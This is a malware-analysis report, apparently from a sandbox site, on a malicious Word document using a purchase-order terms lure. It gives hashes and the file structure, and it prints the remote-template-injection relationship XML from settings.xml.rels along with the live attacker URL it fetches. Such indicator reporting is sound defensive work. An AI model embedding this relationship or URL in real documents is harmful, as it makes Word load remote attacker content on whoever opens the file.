Malicious
Malicious

d3fc62896192d8089e41d60a885f9561

MS Word Document
|
MD5: d3fc62896192d8089e41d60a885f9561
|
Size: 291.1 KB
|
application/msword

Office Document
Remote Template Injection
T1221
Moderately Suspicious Document
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
d3fc62896192d8089e41d60a885f9561
Sha1
53d5ae034bcea350f3d190707db74bcbc3ac176c
Sha256
85221167e34e28f2dd27cfe16dfc7fec92ec1f06968f3e20c01999d11fbbe1df
Sha384
7dff2d783e5540db914615dfdeb2645dda3577d55a6dcba842bb96869d0e6d4c1bc866df63932ff5fdec595795ca8696
Sha512
6b61de3b236df3d7f4155fd022e9ad1a3a4b438b91689f5fd38462d9ab7c430012a913b56293ee5197e657f57cb46c4ff3111e2ccabfdedbb6fe35aa490c898e
SSDeep
6144:z/LjXKGDc/ZZvg0I+18qxnivzQOgN97DqoAmmYRQhhTU:LLmbZZvFL1877QvN97hlmhTU
TLSH
875423EFF6EC23C5D328C1619873BA580AADE4C7DA47F983971C6F0AD26A5C74011867
File Structure
d3fc62896192d8089e41d60a885f9561
Office Document
Remote Template Injection
T1221
Moderately Suspicious Document
Malicious
[Content_Types].xml
Xml
_rels
.rels
Xml
word
Malicious
_rels
Malicious
document.xml.rels
Xml
settings.xml.rels
Xml
Remote Template Injection
T1221
Moderately Suspicious Document
Malicious
document.xml
Xml
media
image1.emf
embeddings
oleObject1.bin
Office Document
Root Entry
Ole
CompObj
ObjInfo
CONTENTS
Text (Preview)
Page #1
PDF Text Preview (generated)
Page #2
PDF Text Preview (generated)
#Stream {6}
#Stream {154}
#Stream {155}
#Stream {156}
#Stream {157}
#Stream {158}
#Stream {159}
#Stream {160}
#Stream {161}
#Stream {162}
#Stream {152}
#Stream {163}
#Stream {153}
#Stream {2}
Structure
theme
theme1.xml
Xml
settings.xml
Xml
webSettings.xml
Xml
styles.xml
Xml
fontTable.xml
Xml
docProps
core.xml
Xml
app.xml
Xml
Malware Configuration - Remote Template
Config. Field
Value
Target

https://systemchangedentirethingsforbesttoprovidebetterthingstounderstandoing.Dot@a38.fr/X7cvg6

Path

settings.xml.rels

XPath

/Relationships/Relationship

Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://systemchangedentirethingsforbesttoprovidebetterthingstounderstandoing.Dot@a38.fr/X7cvg6" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />

Informations
Name
Value
CONTENTS

1.6

CONTENTS

Karim Naghi

CONTENTS

D:20240604155102+04'00'

CONTENTS

Acrobat PDFMaker 24 for Word

CONTENTS

D:20240604155104+04'00'

CONTENTS

Terms & Conditions

CONTENTS

Terms & Conditions of PO

CONTENTS

Adobe PDF Library 24.2.23

CONTENTS

Karim Naghi

CONTENTS

DAS Holding

CONTENTS

D:20240604155102+04'00'

CONTENTS

Acrobat PDFMaker 24 for Word

CONTENTS

Karim Naghi

CONTENTS

D:20240604155104+04'00'

CONTENTS

Adobe PDF Library 24.2.23

CONTENTS

D:20240604114755

CONTENTS

Terms & Conditions

CONTENTS

Terms & Conditions of PO

Artefacts
Name
Value
Remote Template - Highly Suspicious

https://systemchangedentirethingsforbesttoprovidebetterthingstounderstandoing.Dot@a38.fr/X7cvg6

d3fc62896192d8089e41d60a885f9561 (291.1 KB)
File Structure
d3fc62896192d8089e41d60a885f9561
Office Document
Remote Template Injection
T1221
Moderately Suspicious Document
Malicious
[Content_Types].xml
Xml
_rels
.rels
Xml
word
Malicious
_rels
Malicious
document.xml.rels
Xml
settings.xml.rels
Xml
Remote Template Injection
T1221
Moderately Suspicious Document
Malicious
document.xml
Xml
media
image1.emf
embeddings
oleObject1.bin
Office Document
Root Entry
Ole
CompObj
ObjInfo
CONTENTS
Text (Preview)
Page #1
PDF Text Preview (generated)
Page #2
PDF Text Preview (generated)
#Stream {6}
#Stream {154}
#Stream {155}
#Stream {156}
#Stream {157}
#Stream {158}
#Stream {159}
#Stream {160}
#Stream {161}
#Stream {162}
#Stream {152}
#Stream {163}
#Stream {153}
#Stream {2}
Structure
theme
theme1.xml
Xml
settings.xml
Xml
webSettings.xml
Xml
styles.xml
Xml
fontTable.xml
Xml
docProps
core.xml
Xml
app.xml
Xml
Characteristics
Malware Configuration - Remote Template
Config. Field
Value
Target

https://systemchangedentirethingsforbesttoprovidebetterthingstounderstandoing.Dot@a38.fr/X7cvg6

Path

settings.xml.rels

XPath

/Relationships/Relationship

Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://systemchangedentirethingsforbesttoprovidebetterthingstounderstandoing.Dot@a38.fr/X7cvg6" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />

Artefacts
Name
Value Location
Remote Template - Highly Suspicious

https://systemchangedentirethingsforbesttoprovidebetterthingstounderstandoing.Dot@a38.fr/X7cvg6

Malicious

d3fc62896192d8089e41d60a885f9561 > word > _rels > settings.xml.rels

You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙